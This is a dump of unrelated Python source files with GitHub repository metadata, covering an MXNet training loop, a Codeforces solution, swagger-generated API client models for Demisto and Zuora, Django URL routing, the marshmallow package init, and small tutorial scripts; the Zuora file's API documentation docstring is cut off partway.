return metric.get()
# start train
lr_counter = 0
num_batch = len(train_data)
import time
t0 = time.time()
for epoch in range(epochs):
if epoch == lr_steps[lr_counter]:
trainer.set_learning_rate(trainer.learning_rate*lr_factor)
lr_counter += 1
tic = time.time()
train_loss = 0
metric.reset()
for i, batch in enumerate(train_data):
data = gluon.utils.split_and_load(batch[0], ctx_list=ctx, batch_axis=0, even_split=False)
label = gluon.utils.split_and_load(batch[1], ctx_list=ctx, batch_axis=0, even_split=False)
with ag.record():
outputs = [finetune_net(X) for X in data]
loss = [L(yhat, y) for yhat, y in zip(outputs, label)]
for l in loss:
l.backward()
trainer.step(batch_size)
train_loss += sum([l.mean().asscalar() for l in loss]) / len(loss)
metric.update(label, outputs)
_, train_acc = metric.get()
train_loss /= num_batch
_, val_acc = test(finetune_net, val_data, ctx)
print('[Epoch %d] Train-acc: %.3f, loss: %.3f | Val-acc: %.3f | time: %.1f' %
(epoch, train_acc, train_loss, val_acc, time.time() - tic))
print("Training Duration is {}".format(time.time() - t0))
_, test_acc = test(finetune_net, test_data, ctx)
print('[Finished] Test-acc: %.3f' % (test_acc)) | [
"18702602693@139.com"
] | 18702602693@139.com |
c66cf4794093353d10b617c6bc645d36290a7bda | 4c88477f18547df725150a5c29371f99af2a2acb | /Codeforces/Problems/Appleman.py | c195b73fa72a2a49da52580a25d02a4e7709ee7a | [] | no_license | SEETHAMRAJU/Competitive_Programming | 912b1e81d3cc07b5eeaebbf0086520700867df4e | b456a35766697363c9b77552a50db2ae1cc42ffd | refs/heads/master | 2020-03-26T09:15:23.047626 | 2019-10-06T05:06:42 | 2019-10-06T05:06:42 | 144,742,673 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 602 | py | def update(l,i,j):
if(i != 0):
l[i-1][j] += 1
if(i!=len(l)-1):
l[i+1][j] += 1
if(j!=0):
l[i][j-1] += 1
if(j!= len(l[0])-1):
l[i][j+1] += 1
return l
n = input()
l = []
for i in range(0,n):
p = raw_input()
l.append(p)
x = []
for i in range(0,n):
temp = [0]*n
x.append(temp)
for i in range(0,n):
for j in range(0,n):
if(l[i][j] == "o"):
update(x,i,j)
for i in range(0,n):
for j in range(0,n):
if(x[i][j]%2 == 1 or x[i][j] == 1 ):
print "NO"
exit()
print "YES"
| [
"spurvaj@gmail.com"
] | spurvaj@gmail.com |
3a44673f51aecec53577c003f0719dad6f4cb3a4 | 669ab595ae969c944a7583508b58b30d348099ce | /demisto_client/demisto_api/models/raw_message.py | 562f78bb79ed213c7db2bc878c8706e9f7bc1d27 | [
"Apache-2.0",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | demisto/demisto-py | 6f2d357884cee1fd488ad87edd78067a18a4f89a | f44bd0d8a38ac97b071d9c181f0137557077335d | refs/heads/master | 2023-08-17T13:41:47.924342 | 2023-06-05T09:04:27 | 2023-06-05T09:04:27 | 81,979,463 | 67 | 48 | Apache-2.0 | 2023-09-14T08:19:21 | 2017-02-14T19:09:05 | Python | UTF-8 | Python | false | false | 3,905 | py | # coding: utf-8
"""
Demisto API
This is the public REST API to integrate with the demisto server. HTTP request can be sent using any HTTP-client. For an example dedicated client take a look at: https://github.com/demisto/demisto-py. Requests must include API-key that can be generated in the Demisto web client under 'Settings' -> 'Integrations' -> 'API keys' Optimistic Locking and Versioning\\: When using Demisto REST API, you will need to make sure to work on the latest version of the item (incident, entry, etc.), otherwise, you will get a DB version error (which not allow you to override a newer item). In addition, you can pass 'version\\: -1' to force data override (make sure that other users data might be lost). Assume that Alice and Bob both read the same data from Demisto server, then they both changed the data, and then both tried to write the new versions back to the server. Whose changes should be saved? Alice’s? Bob’s? To solve this, each data item in Demisto has a numeric incremental version. If Alice saved an item with version 4 and Bob trying to save the same item with version 3, Demisto will rollback Bob request and returns a DB version conflict error. Bob will need to get the latest item and work on it so Alice work will not get lost. Example request using 'curl'\\: ``` curl 'https://hostname:443/incidents/search' -H 'content-type: application/json' -H 'accept: application/json' -H 'Authorization: <API Key goes here>' --data-binary '{\"filter\":{\"query\":\"-status:closed -category:job\",\"period\":{\"by\":\"day\",\"fromValue\":7}}}' --compressed ``` # noqa: E501
OpenAPI spec version: 2.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class RawMessage(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
}
attribute_map = {
}
def __init__(self): # noqa: E501
"""RawMessage - a model defined in Swagger""" # noqa: E501
self.discriminator = None
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(RawMessage, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, RawMessage):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"1395797+glicht@users.noreply.github.com"
] | 1395797+glicht@users.noreply.github.com |
f31fffc22d0f0d9ff2a361231c5c89c920a811cb | 4caad96a952bc3d6db2dbf16d4a268c32678abfa | /post/post/urls.py | 23399f285510b154cbac35d98bf4c0f62cca4ad9 | [] | no_license | jvivianwang/bLOG | 3a2a6875579b2976140fd10c37aa3b1acb61e3bc | 193bbe28fac8d18198389320792989402b151b97 | refs/heads/master | 2022-11-22T05:05:22.933323 | 2020-07-27T23:31:05 | 2020-07-27T23:31:05 | 282,291,832 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,377 | py | """post URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.contrib.auth import views as auth_views
from django.urls import path, include
from django.conf import settings
from django.conf.urls.static import static
from users import views as user_views
urlpatterns = [
path('admin/', admin.site.urls),
path('register/', user_views.register, name='register'),
path('profile/', user_views.profile, name='profile'),
path('login/', auth_views.LoginView.as_view(template_name='users/login.html'), name='login'),
path('logout/', auth_views.LogoutView.as_view(template_name='users/logout.html'), name='logout'),
path('', include('blog.urls')),
]
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) | [
"vwangjianing@gmail.com"
] | vwangjianing@gmail.com |
de691e26541b5bab6447b5eb608bc3519d2b21ef | a7cd332b3a21e0a2f78c1a3ffcf67b847ce3d6b7 | /v/Lib/site-packages/marshmallow/__init__.py | f846f8889b84730d8048023e5fdfb41d98726bbe | [] | no_license | ElcyJ/ProjetoFinal-ADS_1 | dcd23376487999146da42d41e828e9428acec576 | 0b8a97af18fa3d9d689fd09b09993619ac918a0e | refs/heads/master | 2022-11-02T00:39:51.398007 | 2018-08-27T16:23:43 | 2018-08-27T16:23:43 | 145,935,118 | 1 | 1 | null | 2022-10-22T13:41:50 | 2018-08-24T03:00:07 | Python | UTF-8 | Python | false | false | 713 | py | # -*- coding: utf-8 -*-
from __future__ import absolute_import
from marshmallow.schema import (
Schema,
SchemaOpts,
MarshalResult,
UnmarshalResult,
)
from . import fields
from marshmallow.decorators import (
pre_dump, post_dump, pre_load, post_load, validates, validates_schema
)
from marshmallow.utils import pprint, missing
from marshmallow.exceptions import ValidationError
__version__ = '2.15.4'
__author__ = 'Steven Loria'
__all__ = [
'Schema',
'SchemaOpts',
'fields',
'validates',
'validates_schema',
'pre_dump',
'post_dump',
'pre_load',
'post_load',
'pprint',
'MarshalResult',
'UnmarshalResult',
'ValidationError',
'missing',
]
| [
"Elcy James"
] | Elcy James |
56dcd39af288060735cc5e09b9ee59454fc41084 | d3ba978b2e830a90f9a9b0854cc0884830db7a14 | /2-列表、元组与字典/如何对列表进行排序.py | 70bc126e24ca5773c031da0d41abd793c393387c | [
"MIT"
] | permissive | yxys01/interview | 57c1239b4ecc56b3ec7c4c8ff3f26a8b822c3be7 | f8cdf61bc61575dd8c4ed765c4184aeb47526d25 | refs/heads/master | 2022-04-26T23:06:14.155346 | 2020-04-25T03:47:59 | 2020-04-25T03:47:59 | 258,681,365 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 427 | py | # 第一题:排序列表的方法
a = [5,4,2,7,3,8,3]
a.sort() # 升序排列 [2, 3, 3, 4, 5, 7, 8]
print(a)
b = [6,4,3,3,76,2,234]
c = sorted(b)
print(c)
# 第二题:sort和sorted的区别
'''
1、sort属于列表,sorted是独立的函数
2、sort改变列表本身,sorted返回一个排好序的列表副本
'''
print(c == b)
# 第三题:降序排列
a.sort(reverse=True)
print(a)
print(sorted(b,reverse=True))
| [
"420393969@qq.com"
] | 420393969@qq.com |
d67638dfec7d1187d63047a5496b52f5082ba82f | 55c3087155f9b18897cd88cb8ec23ac7b0d4b289 | /Task3.py | 63de34b19277eb28ca4bfbc4652fa6052c3f89d0 | [] | no_license | saimy019/PythonPrimers | 5dcb2dac79933e717443294b18f7b95765a1540b | a1acad89d010b1b36e23c92d1dfe8b4747cf63a3 | refs/heads/master | 2022-11-12T16:08:29.486670 | 2020-07-03T03:54:09 | 2020-07-03T03:54:09 | 256,905,902 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 444 | py | enterTime = float(input('Enter the time in second to determine the stage of the flight '))
#enterTime = float(enterTime)
if (enterTime >= 0 and enterTime < 100):
print ('The flight is in Stage 1!')
elif (enterTime >= 100 and enterTime < 170):
print ('The flight is in Stage 2!')
elif (enterTime >= 170 and enterTime >= 260):
print ('The flight is in Stage 3!')
else:
print ("The flight is un-powered, please start the flight!")
| [
"63940840+saimy019@users.noreply.github.com"
] | 63940840+saimy019@users.noreply.github.com |
3f93dd4b32902655f6bb93ba2b92506a35e09731 | 2a8a6327fb9a7ce8696aa15b197d5170661fb94f | /test/test_proxy_create_unit_of_measure.py | bd4624567b71d70ed1b83154b833d92e29752db3 | [] | no_license | moderndatainc/zuora-client | 8b88e05132ddf7e8c411a6d7dad8c0baabaa6dad | d50da49ce1b8465c76723496c2561a3b8ebdf07d | refs/heads/master | 2021-09-21T19:17:34.752404 | 2018-08-29T23:24:07 | 2018-08-29T23:24:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 38,768 | py | # coding: utf-8
"""
Zuora API Reference
# Introduction Welcome to the reference for the Zuora REST API! <a href=\"http://en.wikipedia.org/wiki/REST_API\" target=\"_blank\">REST</a> is a web-service protocol that lends itself to rapid development by using everyday HTTP and JSON technology. The Zuora REST API provides a broad set of operations and resources that: * Enable Web Storefront integration from your website. * Support self-service subscriber sign-ups and account management. * Process revenue schedules through custom revenue rule models. * Enable manipulation of most objects in the Zuora Object Model. Want to share your opinion on how our API works for you? <a href=\"https://community.zuora.com/t5/Developers/API-Feedback-Form/gpm-p/21399\" target=\"_blank\">Tell us how you feel </a>about using our API and what we can do to make it better. ## Access to the API If you have a Zuora tenant, you can access the Zuora REST API via one of the following endpoints: | Tenant | Base URL for REST Endpoints | |-------------------------|-------------------------| |US Production | https://rest.zuora.com | |US API Sandbox | https://rest.apisandbox.zuora.com| |US Performance Test | https://rest.pt1.zuora.com | |EU Production | https://rest.eu.zuora.com | |EU Sandbox | https://rest.sandbox.eu.zuora.com | The Production endpoint provides access to your live user data. API Sandbox tenants are a good place to test code without affecting real-world data. If you would like Zuora to provision an API Sandbox tenant for you, contact your Zuora representative for assistance. **Note:** If you have a tenant in the Production Copy Environment, submit a request at <a href=\"http://support.zuora.com/\" target=\"_blank\">Zuora Global Support</a> to enable the Zuora REST API in your tenant and obtain the base URL for REST endpoints. If you do not have a Zuora tenant, go to <a href=\"https://www.zuora.com/resource/zuora-test-drive\" target=\"_blank\">https://www.zuora.com/resource/zuora-test-drive</a> and sign up for a Production Test Drive tenant. The tenant comes with seed data, including a sample product catalog. # API Changelog You can find the <a href=\"https://community.zuora.com/t5/Developers/API-Changelog/gpm-p/18092\" target=\"_blank\">Changelog</a> of the API Reference in the Zuora Community. # Authentication ## OAuth v2.0 Zuora recommends that you use OAuth v2.0 to authenticate to the Zuora REST API. Currently, OAuth is not available in every environment. See [Zuora Testing Environments](https://knowledgecenter.zuora.com/BB_Introducing_Z_Business/D_Zuora_Environments) for more information. Zuora recommends you to create a dedicated API user with API write access on a tenant when authenticating via OAuth, and then create an OAuth client for this user. See <a href=\"https://knowledgecenter.zuora.com/CF_Users_and_Administrators/A_Administrator_Settings/Manage_Users/Create_an_API_User\" target=\"_blank\">Create an API User</a> for how to do this. By creating a dedicated API user, you can control permissions of the API user without affecting other non-API users. If a user is deactivated, all of the user's OAuth clients will be automatically deactivated. Authenticating via OAuth requires the following steps: 1. Create a Client 2. Generate a Token 3. Make Authenticated Requests ### Create a Client You must first [create an OAuth client](https://knowledgecenter.zuora.com/CF_Users_and_Administrators/A_Administrator_Settings/Manage_Users#Create_an_OAuth_Client_for_a_User) in the Zuora UI. To do this, you must be an administrator of your Zuora tenant. This is a one-time operation. You will be provided with a Client ID and a Client Secret. Please note this information down, as it will be required for the next step. **Note:** The OAuth client will be owned by a Zuora user account. If you want to perform PUT, POST, or DELETE operations using the OAuth client, the owner of the OAuth client must have a Platform role that includes the \"API Write Access\" permission. ### Generate a Token After creating a client, you must make a call to obtain a bearer token using the [Generate an OAuth token](https://www.zuora.com/developer/api-reference/#operation/createToken) operation. This operation requires the following parameters: - `client_id` - the Client ID displayed when you created the OAuth client in the previous step - `client_secret` - the Client Secret displayed when you created the OAuth client in the previous step - `grant_type` - must be set to `client_credentials` **Note**: The Client ID and Client Secret mentioned above were displayed when you created the OAuth Client in the prior step. The [Generate an OAuth token](https://www.zuora.com/developer/api-reference/#operation/createToken) response specifies how long the bearer token is valid for. Call [Generate an OAuth token](https://www.zuora.com/developer/api-reference/#operation/createToken) again to generate a new bearer token. ### Make Authenticated Requests To authenticate subsequent API requests, you must provide a valid bearer token in an HTTP header: `Authorization: Bearer {bearer_token}` If you have [Zuora Multi-entity](https://www.zuora.com/developer/api-reference/#tag/Entities) enabled, you need to set an additional header to specify the ID of the entity that you want to access. You can use the `scope` field in the [Generate an OAuth token](https://www.zuora.com/developer/api-reference/#operation/createToken) response to determine whether you need to specify an entity ID. If the `scope` field contains more than one entity ID, you must specify the ID of the entity that you want to access. For example, if the `scope` field contains `entity.1a2b7a37-3e7d-4cb3-b0e2-883de9e766cc` and `entity.c92ed977-510c-4c48-9b51-8d5e848671e9`, specify one of the following headers: - `Zuora-Entity-Ids: 1a2b7a37-3e7d-4cb3-b0e2-883de9e766cc` - `Zuora-Entity-Ids: c92ed977-510c-4c48-9b51-8d5e848671e9` **Note**: For a limited period of time, Zuora will accept the `entityId` header as an alternative to the `Zuora-Entity-Ids` header. If you choose to set the `entityId` header, you must remove all \"-\" characters from the entity ID in the `scope` field. If the `scope` field contains a single entity ID, you do not need to specify an entity ID. ## Other Supported Authentication Schemes Zuora continues to support the following additional legacy means of authentication: * Use username and password. Include authentication with each request in the header: * `apiAccessKeyId` * `apiSecretAccessKey` Zuora recommends that you create an API user specifically for making API calls. See <a href=\"https://knowledgecenter.zuora.com/CF_Users_and_Administrators/A_Administrator_Settings/Manage_Users/Create_an_API_User\" target=\"_blank\">Create an API User</a> for more information. * Use an authorization cookie. The cookie authorizes the user to make calls to the REST API for the duration specified in **Administration > Security Policies > Session timeout**. The cookie expiration time is reset with this duration after every call to the REST API. To obtain a cookie, call the [Connections](https://www.zuora.com/developer/api-reference/#tag/Connections) resource with the following API user information: * ID * Password * For CORS-enabled APIs only: Include a 'single-use' token in the request header, which re-authenticates the user with each request. See below for more details. ### Entity Id and Entity Name The `entityId` and `entityName` parameters are only used for [Zuora Multi-entity](https://knowledgecenter.zuora.com/BB_Introducing_Z_Business/Multi-entity \"Zuora Multi-entity\"). These are the legacy parameters that Zuora will only continue to support for a period of time. Zuora recommends you to use the `Zuora-Entity-Ids` parameter instead. The `entityId` and `entityName` parameters specify the Id and the [name of the entity](https://knowledgecenter.zuora.com/BB_Introducing_Z_Business/Multi-entity/B_Introduction_to_Entity_and_Entity_Hierarchy#Name_and_Display_Name \"Introduction to Entity and Entity Hierarchy\") that you want to access, respectively. Note that you must have permission to access the entity. You can specify either the `entityId` or `entityName` parameter in the authentication to access and view an entity. * If both `entityId` and `entityName` are specified in the authentication, an error occurs. * If neither `entityId` nor `entityName` is specified in the authentication, you will log in to the entity in which your user account is created. To get the entity Id and entity name, you can use the GET Entities REST call. For more information, see [API User Authentication](https://knowledgecenter.zuora.com/BB_Introducing_Z_Business/Multi-entity/A_Overview_of_Multi-entity#API_User_Authentication \"API User Authentication\"). ### Token Authentication for CORS-Enabled APIs The CORS mechanism enables REST API calls to Zuora to be made directly from your customer's browser, with all credit card and security information transmitted directly to Zuora. This minimizes your PCI compliance burden, allows you to implement advanced validation on your payment forms, and makes your payment forms look just like any other part of your website. For security reasons, instead of using cookies, an API request via CORS uses **tokens** for authentication. The token method of authentication is only designed for use with requests that must originate from your customer's browser; **it should not be considered a replacement to the existing cookie authentication** mechanism. See [Zuora CORS REST](https://knowledgecenter.zuora.com/DC_Developers/REST_API/A_REST_basics/G_CORS_REST \"Zuora CORS REST\") for details on how CORS works and how you can begin to implement customer calls to the Zuora REST APIs. See [HMAC Signatures](https://www.zuora.com/developer/api-reference/#operation/POSTHMACSignature \"HMAC Signatures\") for details on the HMAC method that returns the authentication token. # Requests and Responses ## Request IDs As a general rule, when asked to supply a \"key\" for an account or subscription (accountKey, account-key, subscriptionKey, subscription-key), you can provide either the actual ID or the number of the entity. ## HTTP Request Body Most of the parameters and data accompanying your requests will be contained in the body of the HTTP request. The Zuora REST API accepts JSON in the HTTP request body. No other data format (e.g., XML) is supported. ### Data Type ([Actions](https://www.zuora.com/developer/api-reference/#tag/Actions) and CRUD operations only) We recommend that you do not specify the decimal values with quotation marks, commas, and spaces. Use characters of `+-0-9.eE`, for example, `5`, `1.9`, `-8.469`, and `7.7e2`. Also, Zuora does not convert currencies for decimal values. ## Testing a Request Use a third party client, such as [curl](https://curl.haxx.se \"curl\"), [Postman](https://www.getpostman.com \"Postman\"), or [Advanced REST Client](https://advancedrestclient.com \"Advanced REST Client\"), to test the Zuora REST API. You can test the Zuora REST API from the Zuora API Sandbox or Production tenants. If connecting to Production, bear in mind that you are working with your live production data, not sample data or test data. ## Testing with Credit Cards Sooner or later it will probably be necessary to test some transactions that involve credit cards. For suggestions on how to handle this, see [Going Live With Your Payment Gateway](https://knowledgecenter.zuora.com/CB_Billing/M_Payment_Gateways/C_Managing_Payment_Gateways/B_Going_Live_Payment_Gateways#Testing_with_Credit_Cards \"C_Zuora_User_Guides/A_Billing_and_Payments/M_Payment_Gateways/C_Managing_Payment_Gateways/B_Going_Live_Payment_Gateways#Testing_with_Credit_Cards\" ). ## Concurrent Request Limits Zuora enforces tenant-level concurrent request limits. See <a href=\"https://knowledgecenter.zuora.com/BB_Introducing_Z_Business/Policies/Concurrent_Request_Limits\" target=\"_blank\">Concurrent Request Limits</a> for more information. ## Timeout Limit If a request does not complete within 120 seconds, the request times out and Zuora returns a Gateway Timeout error. ## Error Handling Responses and error codes are detailed in [Responses and errors](https://knowledgecenter.zuora.com/DC_Developers/REST_API/A_REST_basics/3_Responses_and_errors \"Responses and errors\"). # Pagination When retrieving information (using GET methods), the optional `pageSize` query parameter sets the maximum number of rows to return in a response. The maximum is `40`; larger values are treated as `40`. If this value is empty or invalid, `pageSize` typically defaults to `10`. The default value for the maximum number of rows retrieved can be overridden at the method level. If more rows are available, the response will include a `nextPage` element, which contains a URL for requesting the next page. If this value is not provided, no more rows are available. No \"previous page\" element is explicitly provided; to support backward paging, use the previous call. ## Array Size For data items that are not paginated, the REST API supports arrays of up to 300 rows. Thus, for instance, repeated pagination can retrieve thousands of customer accounts, but within any account an array of no more than 300 rate plans is returned. # API Versions The Zuora REST API are version controlled. Versioning ensures that Zuora REST API changes are backward compatible. Zuora uses a major and minor version nomenclature to manage changes. By specifying a version in a REST request, you can get expected responses regardless of future changes to the API. ## Major Version The major version number of the REST API appears in the REST URL. Currently, Zuora only supports the **v1** major version. For example, `POST https://rest.zuora.com/v1/subscriptions`. ## Minor Version Zuora uses minor versions for the REST API to control small changes. For example, a field in a REST method is deprecated and a new field is used to replace it. Some fields in the REST methods are supported as of minor versions. If a field is not noted with a minor version, this field is available for all minor versions. If a field is noted with a minor version, this field is in version control. You must specify the supported minor version in the request header to process without an error. If a field is in version control, it is either with a minimum minor version or a maximum minor version, or both of them. You can only use this field with the minor version between the minimum and the maximum minor versions. For example, the `invoiceCollect` field in the POST Subscription method is in version control and its maximum minor version is 189.0. You can only use this field with the minor version 189.0 or earlier. If you specify a version number in the request header that is not supported, Zuora will use the minimum minor version of the REST API. In our REST API documentation, if a field or feature requires a minor version number, we note that in the field description. You only need to specify the version number when you use the fields require a minor version. To specify the minor version, set the `zuora-version` parameter to the minor version number in the request header for the request call. For example, the `collect` field is in 196.0 minor version. If you want to use this field for the POST Subscription method, set the `zuora-version` parameter to `196.0` in the request header. The `zuora-version` parameter is case sensitive. For all the REST API fields, by default, if the minor version is not specified in the request header, Zuora will use the minimum minor version of the REST API to avoid breaking your integration. ### Minor Version History The supported minor versions are not serial. This section documents the changes made to each Zuora REST API minor version. The following table lists the supported versions and the fields that have a Zuora REST API minor version. | Fields | Minor Version | REST Methods | Description | |:--------|:--------|:--------|:--------| | invoiceCollect | 189.0 and earlier | [Create Subscription](https://www.zuora.com/developer/api-reference/#operation/POST_Subscription \"Create Subscription\"); [Update Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_Subscription \"Update Subscription\"); [Renew Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_RenewSubscription \"Renew Subscription\"); [Cancel Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_CancelSubscription \"Cancel Subscription\"); [Suspend Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_SuspendSubscription \"Suspend Subscription\"); [Resume Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_ResumeSubscription \"Resume Subscription\"); [Create Account](https://www.zuora.com/developer/api-reference/#operation/POST_Account \"Create Account\")|Generates an invoice and collects a payment for a subscription. | | collect | 196.0 and later | [Create Subscription](https://www.zuora.com/developer/api-reference/#operation/POST_Subscription \"Create Subscription\"); [Update Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_Subscription \"Update Subscription\"); [Renew Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_RenewSubscription \"Renew Subscription\"); [Cancel Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_CancelSubscription \"Cancel Subscription\"); [Suspend Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_SuspendSubscription \"Suspend Subscription\"); [Resume Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_ResumeSubscription \"Resume Subscription\"); [Create Account](https://www.zuora.com/developer/api-reference/#operation/POST_Account \"Create Account\")|Collects an automatic payment for a subscription. | | invoice | 196.0 and 207.0| [Create Subscription](https://www.zuora.com/developer/api-reference/#operation/POST_Subscription \"Create Subscription\"); [Update Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_Subscription \"Update Subscription\"); [Renew Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_RenewSubscription \"Renew Subscription\"); [Cancel Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_CancelSubscription \"Cancel Subscription\"); [Suspend Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_SuspendSubscription \"Suspend Subscription\"); [Resume Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_ResumeSubscription \"Resume Subscription\"); [Create Account](https://www.zuora.com/developer/api-reference/#operation/POST_Account \"Create Account\")|Generates an invoice for a subscription. | | invoiceTargetDate | 196.0 and earlier | [Preview Subscription](https://www.zuora.com/developer/api-reference/#operation/POST_SubscriptionPreview \"Preview Subscription\") |Date through which charges are calculated on the invoice, as `yyyy-mm-dd`. | | invoiceTargetDate | 207.0 and earlier | [Create Subscription](https://www.zuora.com/developer/api-reference/#operation/POST_Subscription \"Create Subscription\"); [Update Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_Subscription \"Update Subscription\"); [Renew Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_RenewSubscription \"Renew Subscription\"); [Cancel Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_CancelSubscription \"Cancel Subscription\"); [Suspend Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_SuspendSubscription \"Suspend Subscription\"); [Resume Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_ResumeSubscription \"Resume Subscription\"); [Create Account](https://www.zuora.com/developer/api-reference/#operation/POST_Account \"Create Account\")|Date through which charges are calculated on the invoice, as `yyyy-mm-dd`. | | targetDate | 207.0 and later | [Preview Subscription](https://www.zuora.com/developer/api-reference/#operation/POST_SubscriptionPreview \"Preview Subscription\") |Date through which charges are calculated on the invoice, as `yyyy-mm-dd`. | | targetDate | 211.0 and later | [Create Subscription](https://www.zuora.com/developer/api-reference/#operation/POST_Subscription \"Create Subscription\"); [Update Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_Subscription \"Update Subscription\"); [Renew Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_RenewSubscription \"Renew Subscription\"); [Cancel Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_CancelSubscription \"Cancel Subscription\"); [Suspend Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_SuspendSubscription \"Suspend Subscription\"); [Resume Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_ResumeSubscription \"Resume Subscription\"); [Create Account](https://www.zuora.com/developer/api-reference/#operation/POST_Account \"Create Account\")|Date through which charges are calculated on the invoice, as `yyyy-mm-dd`. | | includeExisting DraftInvoiceItems | 196.0 and earlier| [Preview Subscription](https://www.zuora.com/developer/api-reference/#operation/POST_SubscriptionPreview \"Preview Subscription\"); [Update Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_Subscription \"Update Subscription\") | Specifies whether to include draft invoice items in subscription previews. Specify it to be `true` (default) to include draft invoice items in the preview result. Specify it to be `false` to excludes draft invoice items in the preview result. | | includeExisting DraftDocItems | 207.0 and later | [Preview Subscription](https://www.zuora.com/developer/api-reference/#operation/POST_SubscriptionPreview \"Preview Subscription\"); [Update Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_Subscription \"Update Subscription\") | Specifies whether to include draft invoice items in subscription previews. Specify it to be `true` (default) to include draft invoice items in the preview result. Specify it to be `false` to excludes draft invoice items in the preview result. | | previewType | 196.0 and earlier| [Preview Subscription](https://www.zuora.com/developer/api-reference/#operation/POST_SubscriptionPreview \"Preview Subscription\"); [Update Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_Subscription \"Update Subscription\") | The type of preview you will receive. The possible values are `InvoiceItem`(default), `ChargeMetrics`, and `InvoiceItemChargeMetrics`. | | previewType | 207.0 and later | [Preview Subscription](https://www.zuora.com/developer/api-reference/#operation/POST_SubscriptionPreview \"Preview Subscription\"); [Update Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_Subscription \"Update Subscription\") | The type of preview you will receive. The possible values are `LegalDoc`(default), `ChargeMetrics`, and `LegalDocChargeMetrics`. | | runBilling | 211.0 and later | [Create Subscription](https://www.zuora.com/developer/api-reference/#operation/POST_Subscription \"Create Subscription\"); [Update Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_Subscription \"Update Subscription\"); [Renew Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_RenewSubscription \"Renew Subscription\"); [Cancel Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_CancelSubscription \"Cancel Subscription\"); [Suspend Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_SuspendSubscription \"Suspend Subscription\"); [Resume Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_ResumeSubscription \"Resume Subscription\"); [Create Account](https://www.zuora.com/developer/api-reference/#operation/POST_Account \"Create Account\")|Generates an invoice or credit memo for a subscription. **Note:** Credit memos are only available if you have the Invoice Settlement feature enabled. | | invoiceDate | 214.0 and earlier | [Invoice and Collect](https://www.zuora.com/developer/api-reference/#operation/POST_TransactionInvoicePayment \"Invoice and Collect\") |Date that should appear on the invoice being generated, as `yyyy-mm-dd`. | | invoiceTargetDate | 214.0 and earlier | [Invoice and Collect](https://www.zuora.com/developer/api-reference/#operation/POST_TransactionInvoicePayment \"Invoice and Collect\") |Date through which to calculate charges on this account if an invoice is generated, as `yyyy-mm-dd`. | | documentDate | 215.0 and later | [Invoice and Collect](https://www.zuora.com/developer/api-reference/#operation/POST_TransactionInvoicePayment \"Invoice and Collect\") |Date that should appear on the invoice and credit memo being generated, as `yyyy-mm-dd`. | | targetDate | 215.0 and later | [Invoice and Collect](https://www.zuora.com/developer/api-reference/#operation/POST_TransactionInvoicePayment \"Invoice and Collect\") |Date through which to calculate charges on 